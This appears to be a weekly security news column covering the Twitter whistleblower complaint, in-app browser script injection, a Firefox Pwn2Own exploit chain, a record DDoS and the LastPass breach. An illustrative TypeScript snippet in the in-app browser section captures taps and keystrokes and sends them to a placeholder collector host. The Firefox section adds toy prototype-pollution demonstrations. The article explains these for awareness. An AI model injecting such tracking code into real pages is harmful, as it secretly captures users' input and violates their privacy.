This Week in Security: In Mudge We Trust, Don’t Trust That App Browser, and Firefox at Pwn2Own

There’s yet another brouhaha forming over Twitter, but this time around it’s a security researcher making noise instead of an eccentric billionaire. [Peiter Zatko] worked as Twitter’s security chief for just over a year, from November 2020 through January 2022. You may know Zatko better as [Mudge], a renowned security researcher who literally wrote the book on buffer overflows. He was a member of L0pht Heavy Industries, worked at DARPA and Google, and was brought on at Twitter in response to the July 2020 hack that saw many brand accounts running Bitcoin scams.

[Mudge] was terminated at Twitter in January 2022, and it seems he immediately started putting together a whistleblower complaint. You can access his complaint packet on archive.org, with whistleblower_disclosure.pdf (PDF, and mirror) being the primary document. There are some interesting tidbits in here, like the real answer to how many spam bots are on Twitter: “We don’t really know.” The very public claim that “…<5% of reported mDAU for the quarter are spam accounts” is a bit of a handwave, as the monetizable Daily Active Users count is essentially defined as active accounts that are not bots. Perhaps Mr. Musk has a more legitimate complaint than was previously thought.

Over 30% of Twitter’s employee computers had security updates disabled on some level, and about half of Twitter staff had access to production systems. At one point, [Mudge] felt the need to “seal the production environment”, fearing vandalism from an internal engineer in response to political upheaval. To his astonishment, there was nothing in place to prevent, or even track, that sort of attack. Another worrying discovery was the lack of a disaster plan for a multi-node failure. The details are redacted, but some number of data centers going down at the same time, even gracefully, would cripple Twitter’s infrastructure for weeks or longer, with the note that bootstrapping back to service would be a challenge of unknown difficulty. Interestingly, this exact scenario almost took Twitter down permanently in Spring 2021. I’ll note here that this also implies that Twitter could feasibly suffer from a split-brain scenario if network connectivity between its data centers were interrupted. This is a failure mode in high-availability systems where multiple nodes end up running in master mode at once, and the shared data-set diverges.

There was some odd pushback, like the request that [Mudge] give his initial overview of problems orally, and that he not send the written report to board members. It’s never a good sign when you get a request not to put something in writing. Later, [Mudge] brought an outside firm in to prepare reports on how well Twitter was doing combating the spam and bot problem. Twitter’s executives hired a law firm, routing the reports to the firm first, where they were scrubbed of the most embarrassing details, and only then delivered to [Mudge]. Astounding.

An internal-facing system for Twitter engineers was seeing nearly 3,000 daily failed logins. No one knew why, and it was never addressed. Employee workstations did not have functioning backups, and the response from executives was that at least this gave them a reasonable excuse to not comply with official requests for records. As of earlier this year, Twitter had an estimated 10,000 services that may have Log4j vulnerabilities, and no workable plan to address the possible vulnerabilities. If you wanted a bug bounty from Twitter, this seems like a great place to start.

Things didn’t get better. [Mudge] tried to blow the whistle internally on what he considered to be a fraudulent report presented December 16th to Twitter’s board. This effort percolated through Twitter’s internal structure for a month, and on January 18th he stated that he had an accurate report (PDF, and PDF mirror) nearly ready to present to the board. In what looks like a desperate attempt to prevent that report from being delivered, [Mudge] was fired the next day, January 19th.

My initial response is well summed up by Martin McKeay, ironically on Twitter.

And when you’re looking for a well-reasoned dissent, Robert Graham is usually a good source. He doesn’t disappoint on this topic, making the case that while many of [Mudge]’s concerns are valid, the overall package is overblown. He points to several sections in the complaint that are statements of opinion instead of statements of fact, stating, “It makes him look like a Holy Crusader fighting for a cause, rather than a neutral party delivering his professional expertise.”

In-App Browser

iOS and Android apps have picked up a new habit: opening links in the app itself instead of handing them off to your primary browser. You may not have given the in-app browser much thought, but [Felix Krause] sure has. See, when an app runs its own browser, that app is the boss. The developer wants to inject some CSS or JS on one site, or every site? No problem. And here, HTTPS won’t save you. But surely none of the popular apps would take advantage of this, right?
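
To make the risk concrete, here’s a minimal TypeScript sketch of the kind of script a host app *could* inject into every page its in-app browser renders. The collector URL and the choice of events are made up for illustration; this is a sketch of the capability, not code from any specific app.

```typescript
// Minimal sketch: a script a host app could inject into every page it renders.
// The endpoint below is a placeholder, not any real app's collector.
const report = (event: string, detail: unknown): void => {
  // sendBeacon delivers the payload even if the page is being torn down.
  navigator.sendBeacon(
    "https://collector.example/log",
    JSON.stringify({ event, detail, url: location.href })
  );
};

// Capture-phase listeners see taps and keystrokes before the page's own handlers.
document.addEventListener("click", (e) => report("tap", { x: e.clientX, y: e.clientY }), true);
document.addEventListener("keydown", (e) => report("key", { key: e.key }), true);
```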

That brings us to inappbrowser.com. Send that link to yourself, and open it in the app in question. It searches for odd or known-dangerous JS objects, and lists everything it finds. Keep in mind that not all injected code is malicious; it might just be theming a page, or adding functionality to existing content. A few apps stand out as particularly troublesome, like Instagram, Facebook, and TikTok. TikTok, to no one’s surprise, captures every screen tap and keyboard press made while using the in-app browser. And while most other in-app browsers have a button to open the page in your primary browser, TikTok leaves that one out, making it even harder to escape their walled garden. These issues were specifically observed on iOS, but it’s very likely that similar problems exist in Android apps.
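
One simple way a page can spot this sort of tampering, similar in spirit to what inappbrowser.com does (though this is not its actual code), is to check whether built-in DOM functions still stringify as native code. A rough TypeScript sketch:

```typescript
// Heuristic check: monkey-patched built-ins usually no longer report "[native code]".
const looksNative = (fn: unknown): boolean =>
  typeof fn === "function" &&
  Function.prototype.toString.call(fn).includes("[native code]");

const checks: Array<[string, unknown]> = [
  ["document.addEventListener", document.addEventListener],
  ["window.fetch", window.fetch],
  ["XMLHttpRequest.prototype.send", XMLHttpRequest.prototype.send],
];

for (const [name, fn] of checks) {
  if (!looksNative(fn)) {
    console.warn(`${name} appears to have been overridden by injected code`);
  }
}
```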

Firefox At Pwn2Own

This story comes to us by way of Pwn2Own Vancouver 2022, where [Manfred Paul] demonstrated a novel attack on Mozilla’s Firefox browser. By chaining multiple prototype corruption vulnerabilities, the attack goes all the way from running JavaScript code on a website to arbitrary code execution on the host computer. It’s a single-click exploit, and a really nasty one, but thankfully it was demonstrated at Pwn2Own and fixed in Firefox 100.0.2. Zero Day Initiative has the write-up for us, and part one details the first stage, jumping from JavaScript execution to arbitrary code execution, but still inside the renderer sandbox.

The starting point here is understanding that Firefox implements some of its features entirely in JavaScript, and all the JavaScript that runs inside the renderer sandbox runs in the same context. One of those JavaScript-implemented features is top-level await, a way to load a JavaScript module in the background. If the loaded module overrides the array prototype in a particular way, that override gets called in the feature code. Once called, a handle to the module gets leaked back to the untrusted code. This handle isn’t intended to be exposed, and calls to its functions can be unsafe. This allows breaking out of the JavaScript engine and writing values to arbitrary memory locations, albeit all still inside the browser’s sandbox. Another clever trick is used to actually execute arbitrary code. Floating-point constants are stored inline in WebAssembly methods, and those are executable sections of memory. So snippets of code can be encoded as floating-point numbers, and the return pointer overwritten to jump into them. This isn’t practical for a larger payload, so the technique is used to mark a larger ArrayBuffer object as executable, and then jump to that, which provides arbitrary execution of much larger bits of code.
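
The core trick is easier to see with a toy model. In the hedged sketch below, “privileged” feature code iterates an internal array with the default iterator; because page script has replaced Array.prototype[Symbol.iterator], the override runs with `this` bound to the internal object and can stash a reference to it. This is a generic illustration of prototype tampering, not the actual Firefox code path or payload.

```typescript
// Toy model of the prototype-tampering idea, runnable with Node + ts-node.
let leaked: unknown = null;
const realIterator = Array.prototype[Symbol.iterator];

// 1. Untrusted page script replaces a method on the shared Array prototype.
(Array.prototype as any)[Symbol.iterator] = function (this: any[]) {
  leaked = this;                    // grab a handle to whatever is being iterated
  return realIterator.call(this);   // then behave normally so nothing breaks
};

// 2. "Privileged" feature code, written in JS in the same realm, innocently
//    iterates an internal array it never meant to expose.
function privilegedFeature(): void {
  const internalSecrets = ["not", "meant", "for", "page", "script"];
  let line = "";
  for (const word of internalSecrets) {
    line += word + " ";
  }
  console.log("feature ran:", line.trim());
}

privilegedFeature();
console.log("leaked handle:", leaked); // the internal array escaped to the attacker
```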

Part two of the post is all about how to escape the sandbox and get code running on the system. And in this story, it’s JavaScript Prototype Pollution all the way down. Even outside the sandbox, various bits of the Firefox browser are implemented in JS, and there are several interfaces through which sandboxed code talks to the parent process. So the attack code fiddles with the Object prototype, and then needs to get the tab.setAttribute() function to run, where the manipulated prototype will inject an attribute. The easiest way to pull this off is to crash the tab in question, and since we have arbitrary memory access, it’s trivial. The attribute that gets added is how to handle a title text overflow, and the action to take is to set the tab’s sandbox level to 0. Sneaky.
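
A stripped-down model of the pollution half is below, with a made-up property name standing in for the real tab-restore attribute. It only demonstrates the underlying mechanism: code that reads a property it never explicitly set will happily pick it up from Object.prototype.

```typescript
// Toy model: a value planted on Object.prototype shows up on unrelated objects.
// The property name is invented for illustration; the real exploit targets
// attributes Firefox applies when restoring a crashed tab.
(Object.prototype as any).injectedAttribute = "sandbox-level-0";

// "Parent process"-style code builds a plain object and later checks an
// attribute it assumes is either its own or absent.
const tabConfig: Record<string, string> = { title: "crashed tab" };

if ("injectedAttribute" in tabConfig) {
  // The `in` operator walks the prototype chain, so the polluted value wins.
  console.log("applying attribute:", (tabConfig as any).injectedAttribute);
}
```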

Google Has Entered the DDoS Fight

Google has quite the feather in their DDoS mitigation cap, having successfully stopped the largest HTTPS DDoS attack on record, handling 46 million requests per second against one of their customers. The idea of this attack is that it’s computationally expensive to perform an HTTPS handshake, and if enough new connections arrive at the same time, the servers backing the service can’t keep up. Keep the pressure on, and the service is totally inaccessible.

The real challenge in stopping this particular attack is discerning the malicious traffic from legitimate users. This customer was already using Google’s Adaptive Protection, so a fingerprint of legitimate traffic had already been gathered. The exact details of how malicious traffic was matched haven’t been published, but one could guess that an unusual number of new connections from a single IP address, along with known-compromised IPs, could be part of that solution. Regardless, it’s an impressive feat.
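
Purely as a back-of-the-envelope illustration of that guess, and not Google’s published method, a mitigation layer could track how many new connections each source IP opens per second and shed the outliers. The threshold and window below are arbitrary.

```typescript
// Sketch of one guessed signal: count new connections per source IP over a
// sliding one-second window and refuse IPs that exceed a threshold.
const WINDOW_MS = 1_000;
const MAX_NEW_CONNECTIONS = 50;

const recentConnections = new Map<string, number[]>(); // ip -> connection timestamps

function allowConnection(ip: string, now: number = Date.now()): boolean {
  const times = (recentConnections.get(ip) ?? []).filter((t) => now - t < WINDOW_MS);
  times.push(now);
  recentConnections.set(ip, times);
  return times.length <= MAX_NEW_CONNECTIONS;
}

// Example: the 51st handshake attempt inside one second gets refused.
for (let i = 0; i < 60; i++) {
  if (!allowConnection("203.0.113.7")) {
    console.log(`dropping connection ${i + 1} from 203.0.113.7`);
    break;
  }
}
```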

What Could Go Wrong? This.

And finally, pointed out by user [Hecker] on the Hackaday Discord server, we see the ugly unintended side effect of scanning users’ photos for illegal material. It seems that the mere act of backing up photos to Google Photos triggers such a scan, and this turned into a nightmare scenario for one user. A picture taken for a medical diagnosis led to account termination and a police inquiry, though the detective assigned to the case determined that the whole situation was ridiculous and no crime had occurred. Privacy really does matter, especially for the innocent.

LastPass

And in some very last-minute news, LastPass has published a notice that they detected unauthorized access to their source code via a compromised developer account. It sounds like they are doing a thorough investigation of the incident. LastPass is designed so that secrets are encrypted and decrypted on the user’s machine, so it’s unlikely that any user data has been compromised. Yet. The one attack LastPass could be vulnerable to is the introduction of malicious code into the browser plugin and mobile apps, and a compromised dev account is in some sense the worst case there, so it’s good that they caught it. I’m quite confident their experts are going over their development environment and codebase with a fine-toothed comb at this very moment. More next week if there are updates to be had.
